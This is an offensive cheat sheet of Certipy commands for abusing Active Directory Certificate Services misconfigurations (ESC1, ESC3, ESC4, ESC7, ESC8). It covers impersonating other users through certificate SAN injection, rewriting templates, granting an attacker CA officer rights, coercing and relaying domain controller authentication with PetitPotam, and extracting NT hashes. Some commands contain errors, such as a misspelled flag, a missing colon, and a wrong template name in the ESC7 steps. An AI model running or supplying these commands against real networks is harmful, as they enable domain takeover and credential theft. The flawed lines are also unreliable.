% certipy,adcs,certificate,esc1,esc2,esc3,esc4,esc6,esc7,esc8,privesc

# ESC1-1/2: SAN injection with Client Authentication
certipy req '<domain>/<user>:<password>'@<ca_host> -ca '<ca_name>' -template 'ESC1' -alt '<target_user>@<domain>'

# ESC1-2/2: Extract NT hash from certificate
certipy auth -pfx '<file>.pfx' -username '<user>' -domain '<domain>' -dc-ip <dc_ip>

# ESC3-1/2: Request Agent certificate and request on behalf of other user
certipy req '<domain>/<user>:<password>'@<ca_host> -ca '<ca_name>' -template '<ESC3_template>'

# ESC3-2/2: Use this certificate with -on-behalf-of parameter (must be in the form of domain\user, and not the FQDN of the domain)
certipy req '<domain>/<user>:<password>'@<ca_host> -ca '<ca_name>' -template 'User' -on-behalf-of '<domain>\<user>' -pfx '<file>.pfx'

# ESC4-1/3: Overwrite the template and make it vulnerable to ESC1
certipy template '<domain>/<user>'@<ca_host> -hashes :<nt_hash> -template 'ESC4' -save-old

# ESC4-2/3: Request a certificate
certipy req '<domain>/<user>:<password>'@<ca_host> -ca '<ca_name>' -template 'ESC4' -alt '<target_user>@<domain>'

# ESC4-3/3: Restore the configuration afterwards
certipy template '<domain>/<user>'@<ca_host> -hashes :<nt_hash> -template 'ESC4' -configuration '<file>.json'

# ESC7-1/7: Add Manage Certificates access right
certipy ca '<domain>/<user>:<password>'@<ca_host> -ca '<ca_name>' -add-officer '<attacker_user>'
# ESC7-2/7: Enable SubCA pt1
certipy ca '<domain>/<user>:<password>'@<ca_host> -ca '<ca_name>' -list-templates
# ESC7-3/7: Enable SubCA pt2
certipy ca '<domain>/<user>:<password>'@<ca_host> -ca '<ca_name>' -enbale-template '<template>'
# ESC7-4/7: Request a certificate based on the SubCA certificate template and receive CERTSRV_E_TEMPLATE_DENIED error
certipy req '<domain>/<user><password>'@<ca_host> -ca '<ca_name>' -template 'ESC4' -alt '<target_user>@<domain>'
# ESC7-5/7: Issue a failed certificate request specifying the request ID
certipy ca '<domain>/<user>:<password>'@<ca_host> -ca '<ca_name>' -issue-request <id>
# ESC7-6/7: Retreive certificate
certipy req '<domain>/<user><password>'@<ca_host> -ca '<ca_name>' -retrieve <id>
# ESC7-7/7: Extract NT hash
certipy auth -pfx '<file>.pfx' -username '<user>' -domain '<domain>' -dc-ip <dc_ip>

# ESC8-1/3: Start relay server
certipy relay -ca <ca_ip> -template '<DomainController>'

# ESC8-2/3: Trigger authentication using petitpotam
python3 /opt/PetitPotam/PetitPotam.py '<domain>/<user>:<password>@<fqdn_target>' <attacker_ip>

# ESC8-3/3: Get NT hash of domain controller
certipy auth -pfx '<file>.pfx' -username '<user>' -domain '<domain>' -dc-ip <dc_ip>
